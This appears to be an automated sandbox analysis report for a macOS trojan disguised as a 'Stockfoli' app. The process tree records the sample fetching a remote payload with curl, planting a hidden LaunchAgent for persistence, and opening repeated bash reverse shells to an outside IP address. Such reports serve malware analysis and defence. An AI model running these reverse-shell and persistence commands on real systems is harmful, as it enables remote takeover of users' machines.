Analysis
-
max time network
159s -
platform
macos_amd64 -
resource
macos -
submitted
24-06-2021 12:54
Static task
static1
General
-
Target
Stockfoli.dmg
-
Size
11.2MB
-
MD5
22a526c0658e542f24358178fb079c38
-
SHA1
352985598e83b42e99dfcb19636227335a18f8c0
-
SHA256
118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c
-
SHA512
73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af
Malware Config
Signatures
Processes
-
/bin/shsh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"1⤵PID:552
-
/bin/bashsh -c "sudo open /Volumes/Stockfoli/Stockfoli.app"1⤵PID:552
-
/usr/bin/sudosudo open /Volumes/Stockfoli/Stockfoli.app1⤵PID:552
-
/usr/bin/openopen /Volumes/Stockfoli/Stockfoli.app2⤵PID:553
-
-
/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli1⤵PID:554
-
/bin/bash/bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &"1⤵PID:562
-
/usr/bin/nohupnohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh2⤵PID:563
-
-
/usr/bin/shsh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh2⤵PID:563
-
-
/bin/shsh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh2⤵PID:563
-
-
/bin/bashsh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh2⤵PID:563
-
/usr/bin/curlcurl -ks "http://owpqkszz.info/link.php?run&91.219.237.21"3⤵PID:585
-
-
/usr/bin/base64base64 --decode3⤵PID:587
-
-
/bin/catcat /tmp/.com.apple.upd.plist3⤵PID:588
-
-
/bin/cpcp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist3⤵PID:589
-
-
/bin/catcat /Users/run/Library/LaunchAgents/.com.apple.upd.plist3⤵PID:590
-
-
/bin/launchctllaunchctl load /tmp/.com.apple.upd.plist3⤵PID:591
-
-
/usr/bin/screenscreen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"3⤵PID:596
-
-
-
/usr/bin/whoamiwhoami1⤵PID:566
-
/usr/bin/trtr -dc "[:alnum:].\\r"1⤵PID:568
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵PID:569
-
/usr/bin/curlcurl -s ipecho.net/plain1⤵PID:572
-
/bin/bash/bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &"1⤵PID:573
-
/usr/bin/nohupnohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio2⤵PID:574
-
-
/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio2⤵PID:574
-
-
/bin/bash/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'"1⤵PID:575
-
/usr/bin/screenscreen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"1⤵PID:575
-
/usr/bin/loginlogin -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"1⤵PID:577
-
/bin/bashbash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1"2⤵PID:580
-
/bin/bashbash -i3⤵PID:581
-
-
-
/bin/bash/bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25735 0>&1"1⤵PID:578
-
/bin/bashbash -i2⤵PID:579
-
-
/usr/bin/trtr -dc "[:alnum:].\\r"1⤵PID:583
-
/usr/bin/trtr "[:upper:]" "[:lower:]"1⤵PID:584
-
/bin/launchctllaunchctl list1⤵PID:594
-
/usr/bin/grepgrep upd1⤵PID:595
-
/usr/bin/loginlogin -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"1⤵PID:601
-
/bin/bashbash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1"2⤵PID:603
-
/bin/bashbash -i3⤵PID:604
-
-
-
/bin/bash/bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'"1⤵PID:617
-
/usr/bin/screenscreen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"1⤵PID:617
-
/usr/bin/loginlogin -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"1⤵PID:619
-
/bin/bashbash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1"2⤵PID:620
-
/bin/bashbash -i3⤵PID:621
-
-